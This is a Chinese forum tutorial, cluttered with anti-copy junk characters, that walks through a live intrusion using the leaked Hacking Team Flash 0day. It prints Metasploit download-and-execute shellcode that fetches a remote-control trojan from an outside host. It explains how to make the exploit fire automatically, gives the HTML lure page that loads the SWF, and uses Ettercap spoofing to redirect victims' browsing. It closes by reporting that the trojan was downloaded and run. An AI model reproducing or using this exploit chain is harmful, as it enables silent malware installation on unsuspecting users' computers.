$ t/ m! i$ ^* z y6 ~, ` 三、flash 0day之手工代码修改制作下载者实例入侵演示
+ f$ e: P8 K _3 N+ B$ A利用到的工具:
! W) I6 u/ q# B- }. g: z' y6 D O7 Y- g Msf
- w7 V$ d( n3 z Ettercap
Adobe Flash CS6 - w, I3 X$ z8 f; r& L5 X* l( Y# V+ }
% `: r# W/ \% |* a/ p2 u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
: K) }2 i0 o, [. A1 c1 ?5 ]1 }8 x! P I) ^ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options # t9 t1 O8 K0 K+ c
6 W9 P- v% ]* \! y5 {; I" w" O. o- Y, Y/ p. p' K# d: z2 O 如图:
+ Z- S8 x; ]* V( Q& q7 s
- t7 q- y! J; t4 ~/ Q7 ~$ Q
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ! |9 l$ l- _9 v, }: T8 x3 p# V1 p& l* n
( i/ F5 |% b" j* x1 L" L# n* ~5 h* W5 T1 m
1 W4 `! F1 _ A 然后执行generate -t dword生成shellcode,如下: & Q: H0 C# c' I+ W6 T
复制代码到文本下便于我们一会编辑flash exp,如下:
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
" c5 h C1 q' `0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 6 }* V4 y8 N) z8 z- p4 s' H3 ~9 t
' y7 c+ s# I0 k, y0 @0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, % |( r! H# y! i: X
+ ]$ g" p6 Q( S& t/ _9 d. k 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ; }; p8 g+ Q' j5 W3 D
/ {" y9 N% f, c4 b- w) u2 \1 E- W' d6 F: s% _, ^, i& \4 L 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, # m M0 C n; r/ U k3 s2 q
. a! P. E6 I9 F; \* N) j6 n0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . J7 z+ `& B: D( C7 T }) ^
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & R" |1 A8 A. J& v# D0 y3 D
* f$ A: e& a9 b0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 o0 o8 b# A8 M5 d5 k1 E
/ E0 V6 U5 ]; q) @" X( q V/ D2 p7 L7 u+ b: F- m- A, | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
2 j f" [+ t5 |6 Q: u" K q% Q0 T8 _0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # X4 ^8 p1 U4 Q- Y
$ n+ P4 z$ t( p) t; ?# H6 ~# V/ x- n% u* S4 V- r4 f! N 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * }, B% F1 n( U Y
( D7 W1 m3 j- ^; j; P8 X' s, o: K0 P+ v6 J" v) v2 R2 d 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 N- b, W3 Q- r" i+ K) w
4 J- E$ g$ ~* I8 B
7 m, C W0 P, S$ R: V) o
下面我们来修改flash 0day exp,需要修改三个文件,分别为: / V2 g4 J1 g. T, @
. `; r4 ~- m# o& n, t+ W% q. l3 Q$ `' g3 G- R$ j! N. }
* c" D- R+ d3 [' H 先修改ShellWin32.as,部分源代码如图:
1 o7 S6 [1 E! r9 a. {
- O5 x- ^4 M0 H& s) M, s5 a+ J
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
& W8 r7 v. u+ S& F4 s% \" j$ A; o$ K9 L: _( H
8 P/ A% w+ [$ |
# ?# _8 L5 J: B: t5 R 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
& j* b/ ^! o) Q: V. J8 Y' U. ?5 h1 d( E: Y; O9 e+ D) K: ]
N1 N0 {7 T7 k! ]
' F& F$ Y7 b) ^* B a2 C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * `7 f7 K2 G! V1 H
- }6 R- B2 H$ a8 E ) f, {6 v8 t1 M! ~0 L. P; l
2 g& @3 @. i* k, r1 L8 u' t- A0 R; e! l. G
M) \+ z9 W/ f, ^1 f
' B9 @# M9 @! [; t& A# H$ |
然后点保存,下面我们来编译一下,打开 & p7 e" J. g- ~& k: l9 J
exp1.fla然后点文件-发布,看看编译没错误
q/ q+ [5 Y( r 8 K O# @3 e0 Q( V" B- M8 `
+ L. x7 y' b* t [& x3 Q: C
0 }8 p0 U7 |5 O) G/ n' ]( U : q/ W5 @: G4 a, G) I* M
2 p4 j: ]6 F$ ~" Z) o& T% N
- S* M; w% G* _' I( q2 H5 D. @ 然后我们把生成的
" j" A- @# I( `2 \/ O& j1 U# L' ?) P% I& k+ k3 A1 [' w, ~2 G% l exp1.swf丢到kailinux 的/var/www/html下:
8 H: w% X4 [7 C M9 b) a. v) m: o ] 然后把这段代码好好编辑一下 4 U3 P2 N- S$ l$ J4 ?8 J
9 x: u- G# s& Y3 t7 p/ K2 z3 O: g1 _, v, [ s7 O" I/ z) N) w2 m, J : ]9 r2 M& m% D9 {/ s- d3 S: q
. Z( r- k/ ~3 t
3 i) u, D2 R8 J6 ]( u! x6 d, r5 m- Y) L1 Y' | ! P0 J s+ ]7 \! }& X
) }. N; Y% q+ j, `4 l! |' I. ^6 n3 R$ V' E4 v
3 B2 o" x( B, z, b& h# J% a: H4 F k. J/ T+ N! [5 E
. p y2 V f7 ~' z3 a7 \' e8 u* ~
<!DOCTYPE html>
+ }# ]4 [" o& b# g4 q# D- }4 ?! J9 ]* B4 t <html>
4 _5 ]. K; j/ n+ N# c: j <head> 5 J# y( }; s! K) ^
( u1 o* y% k2 s# z9 H( N! S<meta http-equiv="Content-Type" content="text/html;
& |/ [! O) Q, q! o charset=utf-8"/> % p1 L# V( A( S- S
. j' }& D+ p7 R; j4 K3 T" i% }- c; G4 _% v I, c </head>
4 w2 M2 i7 z8 a8 x$ E2 _& U <body> % ]! \3 D w; n. o, S3 j6 ~" t3 x S
# A3 }% n7 {$ F' A6 V5 ]; n6 @ <h2> Please wait, the requested page is loading...</h2> 0 g5 q( t5 D( J
: E! B; \/ T- ]9 ]. F) h0 o5 |% w/ a6 _& \' H% ~$ a/ A <br>
<OBJECT ! o5 D+ N' N4 `9 P( l# a
8 L% X. V1 m# a% E( S
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
+ D7 t0 P& b) x$ R+ N VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 9 d" p2 b' M5 e# C, n3 g( S6 s
) ? M) C* n7 Z7 ]+ E </body> ; J& d" R# m! m8 [( x r6 q* _: p
7 U- j, B; Y5 m5 y# H' ?/ g5 c X$ ^5 r/ d) v4 b9 t) Z <script>
, N% n1 ]6 ?3 b setTimeout(function () { ( k& r8 ?+ Z4 C& e1 {9 B0 J
3 J f% `8 |7 P, H4 w( _' a2 X% N9 |6 S3 M! R6 [ Q
% z- K' o1 a" m: K( c7 i9 ` window.location.reload();
}, 10000);
6 H& t8 A; D, \* a- }8 t0 e* y; o+ }4 S: {0 V' T 4 O- X0 Y% p( i7 a: c/ p; z
3 y" L! | L$ T0 }</script>
0 E6 d/ Y0 N5 n& l </html> . {( U9 c5 t' |) k; W
8 {1 R+ z) @" \- M1 H
% `6 k6 k, Y4 ?- I- i2 P 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) E3 D$ m- @# _1 l
7 c7 m) M& W" ~1 v1 ` ^( W
6 A. Y( i* b6 K4 m: r " P, v# R5 {8 B. J' D
! a- r1 Y2 S q! a- l7 a 9 \, r( E7 Y7 D; A+ w2 r; {4 i
$ H& Q& b x, f6 B) \ 下面我们用ettercap欺骗如图:
$ m: S5 f. b, j Y; w2 g
8 k1 c; B) i0 G( Q( x/ b
& W% R; \( F# R- y& w: R8 C5 G7 s0 H' M; w, V6 ^9 N9 F 下面我们随便访问个网站看看: 8 d1 v+ G, ~" X9 E1 U1 u+ ~1 g
1 I5 h' n: l% E. R$ l' z3 f' g) [/ P) Z3 W- h" U% b9 w3 T4 W$ W 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
0 b! i: H4 ]* u& S! r/ w
5 A" N# U! J% i. s/ {0 ^3 H: t- H8 D
2 k/ P# q, P$ b: z: z 我们看另一台, 9 ]$ x! a1 k3 h- U! j
5 B* ]( X; o& k0 T/ U, p6 p' v" b
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |